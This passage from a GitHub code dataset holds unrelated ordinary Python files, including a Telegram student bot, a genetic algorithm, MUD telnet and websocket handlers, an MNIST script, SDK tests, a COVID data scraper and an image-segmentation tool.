https://docs.python-telegram-bot.org/en/v{TG_VER}/examples.html\"\n )\n\nfrom telegram import Update\nfrom telegram.constants import ParseMode\nfrom telegram.ext import (\n Application,\n CallbackContext,\n MessageHandler,\n filters,\n ContextTypes,\n ExtBot,\n)\n\n# Enable logging\nlogging.basicConfig(\n format=\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\", level=logging.INFO\n)\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass WebhookUpdate:\n \"\"\"Simple dataclass to wrap a custom update type\"\"\"\n\n user_id: int\n payload: str\n\n\nclass CustomContext(CallbackContext[ExtBot, dict, dict, dict]):\n \"\"\"\n Custom CallbackContext class that makes `user_data` available for updates of type\n `WebhookUpdate`.\n \"\"\"\n\n @classmethod\n def from_update(\n cls,\n update: object,\n application: \"Application\",\n ) -> \"CustomContext\":\n if isinstance(update, WebhookUpdate):\n return cls(application=application, user_id=update.user_id)\n return super().from_update(update, application)\n\n\nasync def driveFolders(update: Update, context):\n await update.message.reply_text(text=\"\"\"درايفات الطلاب: \\n\n\tدفعة 16 \\n\n\tدفعة 17 \\n\n\tدفعة 18 \\n\n\tدفعة 19 \\n\n\tدفعة 20 (مافيا) \\n\n\tدفعة 21 \\n\"\"\",parse_mode=ParseMode.HTML)\n\n\nasync def channels(update: Update, context):\n await update.message.reply_text(text=\"\"\"القنوات المتاحة: \\n\n قنوات علوم الحاسبات \\n\n قنوات تقنية المعلومات \\n\n قنوات نظم المعلومات \\n\n قنوات المواد المشتركة \\n\n بنك المعلومات الطلابي FCIT \\n\n قروب MAFIA 20 ، (مناقشة أو إستفسار تعال هنا): \\n\"\"\",parse_mode=ParseMode.HTML)\n\nasync def avaliableCommands(update: Update, context):\n await update.message.reply_text(\"\"\"الأوامر المتاحة: \\n\n 1- درايف \\n\n 2- قنوات \\n\n 3- بوت20 \\n\n 4- discord\"\"\")\n\n\nasync def discordServer(update: Update, context):\n await update.message.reply_text(\"Programmers of KAU \", parse_mode= ParseMode.HTML)\n\n\n## exam schedule\n\n\nasync def getCourseInfo(update: Update, context):\n message = update.message\n text = message.text.split()[1]\n course = data_list.get(text.upper())\n if course:\n await update.message.reply_text(\"Course: \"+text+\"\\nStudents: \"+course[0]+\"\\nLocation: \"+course[1]+\"\\nTime: \"+course[2]+\"\\ndate: \"+course[3])\n\n\n\n\nasync def main() -> None:\n global data_list\n \"\"\"Set up the application and a custom webserver.\"\"\"\n port = int(os.environ.get('PORT', 5000))\n token = os.environ.get('TOKEN')\n url = os.environ.get('WEBHOOK_URL')\n exam_url = os.environ.get('exam_url')\n admin_chat_id = os.environ.get('admin_chat_id')\n\n data_list = get_exam_schedule(exam_url)\n\n \n context_types = ContextTypes(context=CustomContext)\n # Here we set updater to None because we want our custom webhook server to handle the updates\n # and hence we don't need an Updater instance\n application = (\n Application.builder().token(token).updater(None).context_types(context_types).build()\n )\n # save the values in `bot_data` such that we may easily access them in the callbacks\n application.bot_data[\"url\"] = url\n application.bot_data[\"admin_chat_id\"] = admin_chat_id\n\n # register handlers\n #application.add_handler(CommandHandler(\"start\", start))\n #application.add_handler(TypeHandler(type=WebhookUpdate, callback=webhook_update))\n \n application.add_handler(MessageHandler(filters.Text([\"درايف\"]), driveFolders))\n application.add_handler(MessageHandler(filters.Text([\"قنوات\"]), channels))\n application.add_handler(MessageHandler(filters.Text([\"بوت20\"]), avaliableCommands))\n application.add_handler(MessageHandler(filters.Text([\"discord\"]), discordServer))\n\n # Exam schedule \n \n application.add_handler(MessageHandler(filters.Regex(r'موعد (?:cpcs|CPCS|cpit|CPIT|cpis|CPIS)-\\d{3}'), getCourseInfo))\n \n\n # Pass webhook settings to telegram\n await application.bot.set_webhook(url=f\"{url}/telegram\")\n\n # Set up webserver\n async def telegram(request: Request) -> Response:\n \"\"\"Handle incoming Telegram updates by putting them into the `update_queue`\"\"\"\n await application.update_queue.put(\n Update.de_json(data=await request.json(), bot=application.bot)\n )\n \n return Response()\n\n async def health(_: Request) -> PlainTextResponse:\n \"\"\"For the health endpoint, reply with a simple plain text message.\"\"\"\n return PlainTextResponse(content=\"The bot is still running fine :)\")\n\n starlette_app = Starlette(\n routes=[\n Route(\"/telegram\", telegram, methods=[\"POST\"]),\n Route(\"/healthcheck\", health, methods=[\"GET\"]),\n ]\n )\n webserver = uvicorn.Server(\n config=uvicorn.Config(\n app=starlette_app,\n port=port,\n use_colors=False,\n host=\"0.0.0.0\",\n )\n )\n\n # Run application and webserver together\n async with application:\n await application.start()\n await webserver.serve()\n await application.stop()\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"KhaledMAlasmari/FCIT20Bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":7581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"16154005663","text":"# Briar Doty\n# Nov 2013\n# GeneticAlg.py\n# Genetic algorithm trains Neural network\n\nimport random\nimport Common\n\nclass Chromosome:\n\n\t# Input:\n\t#\t\tweights - vector of weights associated with this chromosome\n\t#\t\tfitness - optional value represents fitness of associated genome\n\t# Output:\n\t#\t\tNone\n\t# Description:\n\t#\t\tConstructor for Chromosome objects\n\tdef __init__(self, weights, fitness=0):\n\t\tself.weights = weights\n\t\tself.fitness = fitness\n\t\t\n\tdef __eq__(self, other):\n\t\treturn self.fitness == other.fitness\n\t\t\n\tdef __lt__(self, other):\n\t\treturn self.fitness > other.fitness\n\t\t\nclass GenAlg:\n\n\t# Input:\n\t# popSize - number of Chromosomes in population\n\t# mutRate - probability a weight will mutate in a single epoch\n\t# crossRate - probability two chromosomes will cross over in single epoch\n\t# numWeight - total number of weights in NN each Chromosome represents\n\t# Output:\n\t#\t\tNone\n\t# Description:\n\t# Initializes state necessary to evolve population of NNs using genetic alg\n\tdef __init__(self, popSize, mutRate, crossRate, numWeight):\n\t\tself.popSize = popSize\n\t\tself.mutRate = mutRate\n\t\tself.crossRate = crossRate\n\t\tself.numWeight = numWeight\n\t\t\n\t# Input:\n\t# c - chromosome to mutate\n\t# Output:\n\t#\t\tmutated chromosome\n\t# Description:\n\t#\t\tPerturb chromosome weights depending on mutation rate\n\tdef mutate(self, c):\n\t\t# traverse chromosome and mutate weights depending on rate\n\t\tfor i in range(len(c.weights)):\n\t\t\tif (random.uniform(0, 1) < self.mutRate): # mutate this weight\n\t\t\t\tc.weights[i] += random.uniform(-1, 1) * Common.maxPerturbation\n\t\t\n\t# Input:\n\t# \t\tc1, c2 - chromosomes to cross over\n\t# Output:\n\t#\t\ttuple containing resulting chromosomes\n\t# Description:\n\t#\t\tSwitch gene segments between 2 given chromosomes based on crossover rate\n\tdef crossover(self, c1, c2):\n\t\tif (random.uniform(0, 1) > self.crossRate or c1.weights == c2.weights): # no crossover\n\t\t\treturn (c1, c2)\n\n\t\t# index of crossover\n\t\tcrossPoint = random.randint(0, self.numWeight - 1)\n\t\t\n\t\t# create offspring\n\t\tr1 = Chromosome(c1.weights[:crossPoint] + c2.weights[crossPoint:])\n\t\tr2 = Chromosome(c2.weights[:crossPoint] + c1.weights[crossPoint:])\n\t\t\n\t\treturn (r1, r2)\n\t\n\t# Input:\n\t#\t\tpopulation - vector of chromosomes representing population of NNs\n\t# Output:\n\t#\t\tan evolved population, new generation\n\t# Description:\n\t#\t\tEvolves the given population one generation\n\tdef evolve(self, population):\n\t\tresult = []\n\t\t\n\t\t# sort population according to fitness\n\t\tpopulation.sort()\n\t\t\n\t\t# increase frequency of fittest chromosomes in population\n\t\tpopulation = self.replicateFittest(Common.numElite, Common.numCopiesElite, population)\n\t\t\n\t\t# main GA loop\n\t\twhile (len(result) < self.popSize):\n\t\t\t# pick 2 chromosomes to alter\n\t\t\tc1 = random.choice(population)\n\t\t\tc2 = random.choice(population)\n\t\t\t\n\t\t\t(c3, c4) = self.crossover(c1, c2)\n\t\t\t\n\t\t\tself.mutate(c3)\n\t\t\tself.mutate(c4)\n\t\t\t\n\t\t\t# add to result new generation\n\t\t\tresult.append(Chromosome(c3.weights))\n\t\t\tresult.append(Chromosome(c4.weights))\n\t\t\n\t\treturn result\n\t\t\n\t# Input:\n\t#\t\tnFittest - number of top-ranked chromosomes to replicate\n\t#\t\tnCopies - number copies of chromosomes to make\n\t#\t\tpopulation - vector of chromosomes representing population of NNs\n\t# Output:\n\t#\t\ta population with increased number of fit chromosomes\n\t# Description:\n\t#\t\tIncreases the frequency of the fittest chromosomes\n\tdef replicateFittest(self, nFittest, nCopies, population):\n\t\t# take nFittest chromosomes and copy them nCopies times\n\t\tfittest = population[:nFittest]\n\t\tresult = population + nCopies * fittest\n\t\t\n\t\treturn result\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t","repo_name":"briardoty/NeuralUI","sub_path":"GeneticAlg.py","file_name":"GeneticAlg.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"30199144023","text":"import re\nimport hashlib\nfrom struct import pack\nfrom socket import error as socket_error\n\nclass ShinyConnection(object):\n \n def __init__(self, conn_info, log):\n self.conn, self.addr = conn_info\n self.log = log\n \n def send(self):\n pass\n \n def recv(self):\n pass\n\n\nclass TelnetConnection(ShinyConnection):\n \n win_change_regexp = re.compile(r\"\\xff\\xfa\\x1f(?P.*?)\\xff\\xf0\")\n \n def __init__(self, conn_info, log):\n ShinyConnection.__init__(self, conn_info, log)\n self.win_size = (80,40)\n self.set_telnet_options()\n # Put our socket into non-blocking mode - we'll periodically poll for data\n # instead of blocking until we get it\n self.conn.setblocking(0)\n \n def send(self, queue):\n try:\n for index, line in enumerate(queue):\n if index != (len(queue) - 1):\n line += '\\r\\n'\n self.conn.send(line)\n del queue[:]\n except socket_error:\n # If we die here, it's probably because we got a broken pipe...\n # tell the function that's calling us we're not alive anymore\n return False\n else:\n return True\n \n def recv(self):\n try:\n new_stuff = self.conn.recv(256)\n except socket_error:\n # In non-blocking mode, recv generates an error if it doesn't find\n # any data to recieve. We want to ignore that error and quitely wait until\n # there is data.\n return False\n else:\n # Get rid of the \\r \\n line terminators\n new_stuff = new_stuff.replace('\\n', '').replace('\\r', '')\n # See if the input is a notice of window size change\n self.parse_winchange(new_stuff)\n # Ignore any other telnet negotiations\n new_stuff = re.sub(r\"\\xff((\\xfa.*?\\xf0)|(..))\", '', new_stuff)\n if new_stuff:\n return new_stuff\n return False\n \n \n def close(self):\n self.conn.close()\n \n def set_telnet_options(self):\n \"\"\"Petition client to run in linemode and to send window size change\n notifications.\n Some telnet clients, such as putty, start in non-linemode by default\n (they transmit each character as they receive it from the player). We want\n them to switch to linemode in this case, where they transmit each line\n after it's been assembled. We also wan't the client to tell us their\n screen size so we can display things appropriately.\n \"\"\"\n # IAC + WILL + LINEMODE\n self.conn.send(chr(255) + chr(251) + chr(34) + '\\r\\n')\n # We should get a response from their client (immediately)\n self.conn.settimeout(1.0)\n try:\n result = list(self.conn.recv(256))\n except socket.timeout:\n # This just means that their telnet client didn't send us a timely\n # response to our initiating linemode... we should just move on\n result = 'Client response FAIL for linemode.'\n finally:\n self.log.debug(result)\n \n # IAC DO NAWS (Negotiate About Window Size)\n self.conn.send(chr(255) + chr(253) + chr(31) + '\\r\\n')\n try:\n result = list(self.conn.recv(256))\n except:\n result = 'Client response FAIL for NAWS.'\n else:\n # IAC WILL NAWS\n if result[0:3] == ['\\xff', '\\xfb', '\\x1f']:\n # win, they're willing to do NAWS! Parse their window info\n stuff = ''.join(result[3:])\n self.parse_winchange(stuff)\n finally:\n self.conn.settimeout(None)\n self.log.debug(str(result))\n \n def parse_winchange(self, data):\n \"\"\"Parse and set the terminal size of the player.\"\"\"\n match = self.win_change_regexp.match(data)\n if match:\n size = match.group('size')\n self.win_size = (ord(size[1]), ord(size[3]))\n \n\n\nclass WebsocketConnection(ShinyConnection):\n handshake_string = \"HTTP/1.1 101 Web Socket Protocol Handshake\\r\\n\\\nUpgrade: WebSocket\\r\\n\\\nConnection: Upgrade\\r\\n\\\nSec-WebSocket-Origin: %(origin)s\\r\\n\\\nSec-WebSocket-Location: ws://%(host)s/\\r\\n\\r\\n\"\n \n def __init__(self, conn_info, log, host, port):\n ShinyConnection.__init__(self, conn_info, log)\n self.host = host\n self.port = port\n self.data_fragment = ''\n self.handshake()\n self.conn.setblocking(0)\n \n def send(self, queue):\n try:\n while (len(queue) > 0):\n line = queue.pop(0)\n line = '\\x00' + line.encode('utf-8') + '\\xFF'\n self.conn.send(line)\n except socket_error:\n # If we die here, it's probably because we got a broken pipe...\n # tell the function that's calling us we're not alive anymore \n return False\n else:\n return True\n \n \n def recv(self):\n try:\n new_stuff = self.data_fragment + self.conn.recv(256)\n except socket_error:\n # In non-blocking mode, recv generates an error if it doesn't find\n # any data to recieve. We want to ignore that error and quitely wait until\n # there is data.\n return False\n else:\n valid_lines = []\n \n # Split all lines on the terminating character\n lines = new_stuff.split('\\xFF')\n \n # Pop the last line off of the end - this will either be an empty string if the\n # last line was terminated, or a left over fragment that should wait for the next batch\n # of lines to be processed\n self.data_fragment = lines.pop()\n \n # Now we should make sure the lines have a valid prefix. Ignore any that don't.\n for line in lines:\n if line[0] == '\\x00':\n valid_lines.append(line[1:])\n elif line == '':\n # The client wishes to terminate - send the closing handshake and disconnect\n self.close()\n # Return None so that the player object knows to log the player out\n return None\n else:\n self.log.error('Received invalid message from client '\n '(frame did not begin with 0x00 byte): %s' % (line))\n \n if valid_lines:\n return valid_lines\n \n return False\n \n \n def handshake(self):\n data = self.conn.recv(1024)\n host = re.findall(r'Host: (.*?)\\r\\n', data)[0]\n origin = re.findall(r'Origin: (.*?)\\r\\n', data)[0]\n response = self.handshake_string % {'origin': origin, 'host': host}\n \n response = response.encode('utf-8') + self.parse_hybi00(data)\n self.conn.send(response)\n \n def close(self):\n self.conn.close()\n \n def parse_hybi00(self, request):\n \"\"\" Parses an HTTP request header and forms a response according to\n The WebSocket protocol, draft-ietf-hybi-thewebsocketprotocol-00\n (http://tools.ietf.org/html/draft-ietf-hybi-thewebsocketprotocol-00).\n \"\"\"\n # The random tokens will be in the last 8 bytes of the request\n random_tokens = request[-8:]\n # Grab the sooper seekret keys hidden away in the request headers\n key1 = re.findall(r'Sec-WebSocket-Key1: (.*?)\\r\\n', request)[0]\n key2 = re.findall(r'Sec-WebSocket-Key2: (.*?)\\r\\n', request)[0]\n \n def parse_key(key):\n spaces = 0\n digits = ''\n \n for char in list(key):\n if char.isdigit():\n # If the character is a digit, concatonate it to our string of digits\n digits += char\n elif char == ' ':\n # If the character is a space, add it to our space counter orgecc\n spaces += 1\n \n result = int(int(digits) / spaces)\n return result\n \n \n response = pack('>II8s', parse_key(key1), parse_key(key2), str(random_tokens))\n hashed_response = hashlib.md5()\n hashed_response.update(response)\n return hashed_response.digest()\n \n\n","repo_name":"shinymud/ShinyMUD","sub_path":"src/shinymud/lib/connection_handlers/shiny_connections.py","file_name":"shiny_connections.py","file_ext":"py","file_size_in_byte":8417,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"61"}
+{"seq_id":"37862647361","text":"import asyncio\nfrom . import ghh\nfrom . import Server\n\n\nasync def on_game_state(message_nr, game_state):\n print(\"Got game state\", message_nr)\n\n\nasync def start_server():\n server = Server()\n server.on_game_state = on_game_state\n await server.serve_forever('0.0.0.0', 58888)\n print(\"Exiting\")\n\nif __name__ == \"__main__\":\n asyncio.run(start_server())\n","repo_name":"Gronis/gloomhaven-helper-rfid","sub_path":"python/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"61"}
+{"seq_id":"41649516317","text":"# 이전 파일 직접 실습한 것과 선생님이 만들어 준 것과 비교!\n\n# 텐서플로 1.14 부터 이미 케라스가 들어가 있어 keras 불러와서 쓸 수 있다.\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nimport tensorflow as tf \nimport numpy as np\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.preprocessing import OneHotEncoder\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.datasets import mnist\n\n# 데이터 지정 + 스케일링\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\ny_train = to_categorical(y_train)\ny_test = to_categorical(y_test)\n\nx_train = x_train.reshape(60000, 28*28).astype('float')/255.\nx_test = x_test.reshape(10000, 28*28).astype('float')/255.\n\nx = tf.placeholder('float', [None, 784])\ny = tf.placeholder('float', [None, 10])\nw = tf.Variable(tf.random_normal([784, 10]), name='weight')\nb = tf.Variable(tf.random_normal([1, 10]), name='bias')\n\n# 모델 구성\nhypothesis = tf.nn.softmax(tf.matmul(x, w) + b)\n\n# 컴파일 훈련(다중분류)\nloss = tf.reduce_mean(-tf.reduce_sum(y * tf.log(hypothesis), axis = 1))\ntrain = tf.train.GradientDescentOptimizer(learning_rate=1e-2).minimize(loss)\n\nwith tf.compat.v1.Session() as sess:\n sess.run(tf.compat.v1.global_variables_initializer())\n\n for epoch in range(2001):\n _, cur_loss = sess.run([train, loss], feed_dict = {x:x_train, y:y_train})\n if epoch%10 == 0:\n y_pred = sess.run(hypothesis, feed_dict = {x:x_test})\n y_pred = np.argmax(y_pred, axis = 1)\n print(f'Epoch {epoch} \\t===========>\\t loss : {cur_loss}')\n\n y_pred = sess.run(hypothesis, feed_dict = {x:x_test})\n y_pred = np.argmax(y_pred, axis = 1)\n\n print('accuracy score : ', accuracy_score(y_test, y_pred))\n\n","repo_name":"YoungriKIM/STUDY","sub_path":"tf114/tf16_mnist2.py","file_name":"tf16_mnist2.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"20375767051","text":"import pytest\n\nfrom meya.button.event.click import ButtonClickEvent\nfrom meya.component.entry.start import ComponentStartEntry\nfrom meya.core.type_registry import TypeRegistry\nfrom meya.element.element_error import ElementValidationError\nfrom meya.element.element_test import create_flow_start_entry\nfrom meya.element.element_test import create_trigger_action_entry\nfrom meya.element.element_test import test_type_registry\nfrom meya.element.element_test import verify_trigger_match\nfrom meya.event.entry import Event\nfrom meya.event.trigger.type import TypeTrigger\nfrom meya.text.component.say import SayComponent\nfrom meya.text.event.say import SayEvent\nfrom typing import Optional\n\n\n@pytest.mark.parametrize(\n (\"event_type\", \"validation_message\"),\n [\n (SayEvent.get_entry_type(test_type_registry), None),\n (\n SayComponent.get_element_type(test_type_registry),\n 'invalid event type \"meya.text.component.say\"',\n ),\n (\n ComponentStartEntry.get_entry_type(test_type_registry),\n 'invalid event type \"meya.component.entry.start\"',\n ),\n (\"foo\", 'invalid event type \"foo\"'),\n ],\n)\ndef test_validate_type(event_type: str, validation_message: Optional[str]):\n trigger = TypeTrigger(\n event_type=event_type,\n action=create_trigger_action_entry(create_flow_start_entry()),\n )\n with TypeRegistry.current.set(test_type_registry):\n if validation_message:\n with pytest.raises(ElementValidationError) as excinfo:\n trigger.validate()\n assert str(excinfo.value) == validation_message\n else:\n trigger.validate()\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize(\n (\"event_type\", \"event\", \"should_match\"),\n [\n (\n SayEvent.get_entry_type(test_type_registry),\n SayEvent(\n user_id=\"u-123\", text=\"t1\", thread_id=\"t-0\", trace_id=\"-\"\n ),\n True,\n ),\n (\n SayEvent.get_entry_type(test_type_registry),\n ButtonClickEvent(\n button_id=\"b-1\",\n text=\"Button\",\n thread_id=\"t-0\",\n user_id=\"u-123\",\n trace_id=\"-\",\n ),\n False,\n ),\n (\n ButtonClickEvent.get_entry_type(test_type_registry),\n SayEvent(\n user_id=\"u-123\", text=\"t1\", thread_id=\"t-0\", trace_id=\"-\"\n ),\n False,\n ),\n (\n ButtonClickEvent.get_entry_type(test_type_registry),\n ButtonClickEvent(\n button_id=\"b-1\",\n text=\"Button\",\n thread_id=\"t-0\",\n user_id=\"u-123\",\n trace_id=\"-\",\n ),\n True,\n ),\n ],\n)\nasync def test_type_trigger(event_type: str, event: Event, should_match: bool):\n trigger = TypeTrigger(\n event_type=event_type,\n action=create_trigger_action_entry(\n create_flow_start_entry(thread_id=event.thread_id)\n ),\n )\n match_data = {\n TypeTrigger.EVENT_KEY: event.to_typed_dict(test_type_registry)\n }\n await verify_trigger_match(\n trigger, event, should_match=should_match, match_data=match_data\n )\n","repo_name":"meya-customers/meya-sdk","sub_path":"meya/event/trigger/type_test.py","file_name":"type_test.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"10572148067","text":"\"\"\"\nWrite a function:\n\ndef solution(A, B, K)\n\nthat, given three integers A, B and K, returns the number of integers within the range [A..B] that are divisible by K, i.e.:\n\n{ i : A ≤ i ≤ B, i mod K = 0 }\n\nFor example, for A = 6, B = 11 and K = 2, your function should return 3, because there are three numbers divisible by 2 within the range [6..11], namely 6, 8 and 10.\n\nWrite an efficient algorithm for the following assumptions:\n\nA and B are integers within the range [0..2,000,000,000];\nK is an integer within the range [1..2,000,000,000];\nA ≤ B\n\"\"\"\n\ndef solution_score_50(A, B, K):\n # write your code in Python 3.6\n divisible_count = 0\n for i in range(A, B + 1):\n if i % K == 0:\n divisible_count += 1\n return divisible_count\n\ndef solution_score_25(A, B, K):\n # write your code in Python 3.6\n divisible_count = 0\n while A <= B:\n if A % K == 0:\n divisible_count += 1\n A += K\n return divisible_count\n\ndef solution_score_100(A, B, K):\n # write your code in Python 3.6\n \"\"\"\n To get multiples of K from A - B.\n Get multiples of K in range B = B // K say kB\n get multiples of K before A: A - 1 // K asy kA\n return difference kB - kA. this gives the multiples of K from A to B\n \"\"\"\n return (B // K) - ((A - 1) // K)","repo_name":"shiram/learning-django-rest","sub_path":"interview_qns/countdiv.py","file_name":"countdiv.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"74663737473","text":"import requests\nimport pandas as pd\nfrom datetime import datetime as dt\nfrom datetime import timedelta\nimport io\n\ndef update_data(response,projection_date,name,log):\n df = pd.read_csv(io.StringIO(response.content.decode('utf-8')))\n\n del df['total_deaths']\n del df['predicted_total_deaths_mean']\n del df['predicted_total_deaths_lower']\n del df['predicted_total_deaths_upper']\n\n del df['predicted_total_infected_mean']\n del df['predicted_total_infected_lower']\n del df['predicted_total_infected_upper']\n\n del df['r_values_mean']\n del df['r_values_lower']\n del df['r_values_upper']\n\n\n\n for i, row in df.iterrows():\n \n date = row['date'].split('-')\n if date[1][0] == '0':\n date[1] = date[1][1]\n if date[2][0] == '0':\n date[2] = date[2][1]\n\n date = date[1] + '/' + date[2] + '/' + date[0]\n df.loc[i,'date'] = date\n\n #account for differences in reported deaths to correspond with the moving average displayed at covid19-projections.com\n if date == '6/25/2020':\n df.loc[i,'actual_deaths'] = 657\n elif date == '7/27/2020':\n df.loc[i,'actual_deaths'] = 483\n\n\n df.to_csv('covid_scraper/covid-projections.csv', index=False)\n\n log.write('({})\\t{}:\\t\\tAdding projections from {} to csv file...\\n'.format(name,dt.now(),str(projection_date).split(' ')[0]))\n\n\ndef scrape():\n name = 'C19-Proj. Scraper'\n log = open('log.txt','a')\n log.write('({})\\t{}:\\t\\tRunning script\\n'.format(name,dt.now()))\n\n url = \"https://raw.githubusercontent.com/youyanggu/covid19_projections/master/projections/{}/US.csv\" \n log.write('({})\\t{}:\\t\\tRequesting data...\\n'.format(name,dt.now()))\n\n date = dt.now()\n\n response = None\n try: \n response = requests.get(url.format(str(date)).split(' ')[0])\n\n while response.status_code !=200:\n date = date - timedelta( days=1)\n response = requests.get(url.format(str(date).split(' ')[0]))\n\n if response.status_code == 200:\n log.write('({})\\t{}:\\t\\tData received\\n'.format(name,dt.now()))\n\n log.write('({})\\t{}:\\t\\tUpdating csv file..\\n'.format(name,dt.now()))\n try:\n update_data(response,date, name, log)\n log.write('({})\\t{}:\\t\\tData written to csv\\n'.format(name,dt.now()))\n except:\n log.write('({})\\t{}:\\t\\tError writing data to csv\\n'.format(name,dt.now()))\n\n else:\n log.write('({})\\t{}:\\t\\tError retrieving data; Status code:{}\\n'.format(name,dt.now(), response.status_code))\n\n except:\n log.write('({})\\t{}:\\t\\tError retrieving data; Response failed\\n'.format(name,dt.now()))\n\n log.write('({})\\t{}:\\t\\tFinished script\\n'.format(name,dt.now()))\n log.close() \n\n\n","repo_name":"Andres-Carranza/Andres-Carranza.github.io","sub_path":"scripts/scrapers/covid_scraper/scrape_covid_projections.py","file_name":"scrape_covid_projections.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"29418320414","text":"def compare_string(string_1, string_2):\n if len(string_1) != len(string_2):\n return 'Not same';\n \n for i in range(len(string_1)):\n if string_1[i] != string_2[i]:\n return 'Not same';\n else:\n continue;\n return 'same';\n\nstr_1 = 'IncludeHelp.com';\nstr_2 = 'IncludeHelp.com';\nprint(compare_string(str_1,str_2));\n\n","repo_name":"rajibhasan01/Data_Structure_And_Algorithm","sub_path":"compare_string.py","file_name":"compare_string.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"29184634796","text":"import os\nimport shutil\nfrom PIL import Image\nimport ipywidgets as widgets\nfrom Modules import Q_UIparts\nfrom itertools import product\nfrom ipyfilechooser import FileChooser\nfrom Modules.Q_UniversalFunction import ValidImageType, ImageToLabel\n\n#Functie voor het opsnijden van foto's in segmenten\ndef FotoSegmentatie(ImageMap, Output, Size, Overlap):\n #Maakt een lijst van alle afbeeldingen met ondersteunde bestandstype in de fotomap\n docs = [file for file in os.listdir(ImageMap) if ValidImageType(file)]\n\n #Maakt een wachtscherm en een laadbalk om aan te geven hoever de code is.\n ProgressBar = widgets.IntProgress(\n value=0,\n max=len(docs),\n description=\"Progress:\",\n )\n WachtScherm = widgets.HTML(\n value=\"Foto's worden gesegmenteerd: \",\n )\n display(WachtScherm, ProgressBar)\n\n #gaat door alle afbeeldingen in de lijst\n for Files in docs:\n ProgressBar.value += 1\n\n #leest de foto is en checkt of deze verticaal georiënteerd staat. \n #Zonder deze stap kloppen de coördinaten in de naam niet en is het samenvoegen van annotaties voor een hele plaat onnodig moeilijk\n image = Image.open(os.path.join(ImageMap, Files))\n Width, Height = image.size\n if Width > Height:\n image = image.rotate(-90, expand=True)\n Width, Height = image.size\n\n #Is later nodig voor de nieuwe namen\n FileName, FileType = os.path.splitext(Files)\n\n #Berekent de hoek coördinaten voor alle toekomstige segmenten\n grid = product(\n range(0, Width, (Size - Overlap)), \n range(0, Height, (Size - Overlap)),\n )\n\n #segmenteerd de foto en slaat deze op onder het {project)/data/annotaties/{Data set}/images waarbij de naam bestaat uit naam van de complete foto + de coördinaten (in pixels, hoek rechts boven)\n for x, y in grid:\n box = (x, y, x + Size, y + Size)\n out = os.path.join(Output, f\"{FileName}_{y}_{x}{FileType}\")\n image.crop(box).save(out)\n image.close()\n\n ProgressBar.close()\n WachtScherm.close()\n\n#Functie voor het Verplaatsen van foto's volgens de data ordening \ndef FotoOrdening(ImageMap, OutputImage, LabelMap, OutputLabels):\n #Maakt een lijst van alle afbeeldingen met ondersteunde bestandstype in de fotomap\n docs = [file for file in os.listdir(ImageMap) if ValidImageType(file)]\n\n #Maakt een wachtscherm en een laadbalk om aan te geven hoever de code is.\n ProgressBar = widgets.IntProgress(\n value=0,\n max=len(docs),\n description=\"Progress:\",\n )\n WachtScherm = widgets.HTML(\n value=\"Foto's worden gekopieerd en geordend: \",\n )\n display(WachtScherm, ProgressBar)\n\n #Checkt of de aangegeven Label map de label vertalingen heeft en kopieert deze als ze bestaan.\n if LabelMap and os.path.exists(os.path.join(LabelMap, \"Labels.txt\")):\n shutil.copy2(os.path.join(LabelMap, \"Labels.txt\"), OutputLabels)\n\n #Gaat over de lijst van afbeeldingen en kopieert ze naar de nieuwe locatie, checkt tegelijkertijd of er in de label map een annotatie bestaat voor de desbetreffende afbeelding en kopieert deze mee als hij bestaat. \n for Files in docs:\n ProgressBar.value += 1\n shutil.copy2(os.path.join(ImageMap, Files), OutputImage)\n if LabelMap and os.path.exists(os.path.join(LabelMap, ImageToLabel(Files))):\n shutil.copy2(os.path.join(LabelMap, ImageToLabel(Files)), OutputLabels)\n \n\n ProgressBar.close()\n WachtScherm.close()\n\n#Deze functie maakt de interface van deze tool aan.\ndef FotoPreparatie():\n DataNaamTitel = widgets.HTML(value =\"Geef hier de naam voor de nieuwe dataset:\")\n\n ImagePickTitelSM = widgets.HTML(value = \"Selecteer hier de folder met foto's die gesegmenteerd gaan worden:\")\n ImagePickTitelOR = widgets.HTML(value = \"Selecteer hier de folder met foto's die gekopieerd en herordend gaan worden:\")\n LabelPickTitel = widgets.HTML(value = \"Niet verplicht! Selecteer hier de folder met bijbehorende annotaties als je deze hebt:\")\n\n SizeTitel = widgets.HTML(value = \"De foto's worden opgedeeld in vierkante segmenten met zijdes van \")\n Size = widgets.BoundedIntText(\n value=640,\n min=10,\n max=20000,\n step=1,\n disabled=False,\n layout = widgets.Layout(width = \"60px\")\n )\n\n OverlapTitel = widgets.HTML(value = \"de segmenten hebben een overlap met naast liggende segmenten van:\")\n OverlapNum = widgets.BoundedIntText(\n value=10,\n min=0,\n max=50,\n step=1,\n disabled=False,\n layout = widgets.Layout(width = \"60px\")\n )\n #Geeft een visuele indicatie hoeveel overlap 